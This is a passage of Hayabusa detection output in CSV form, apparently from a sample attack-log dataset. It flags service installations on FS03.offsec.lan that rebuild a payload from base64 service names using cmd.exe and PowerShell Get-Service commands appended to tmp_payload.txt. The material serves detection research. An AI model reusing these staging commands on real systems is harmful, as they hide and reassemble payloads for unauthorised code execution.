Tchopper.evtx" +2021-11-03 08:15:45.554 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:45.554 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:45.554 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:47.028 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:47.028 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:47.028 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:48.498 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:48.498 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:48.498 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:49.956 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:49.956 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:49.956 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:51.402 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:51.402 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:51.402 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:52.852 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:52.852 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:52.852 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:54.314 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:54.314 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:54.314 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:55.766 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:55.766 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:55.766 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:57.209 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:57.209 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:57.209 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:58.646 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:58.646 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:58.646 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:00.100 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:00.100 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:00.100 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:01.552 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:01.552 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:01.552 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:02.992 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:02.992 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 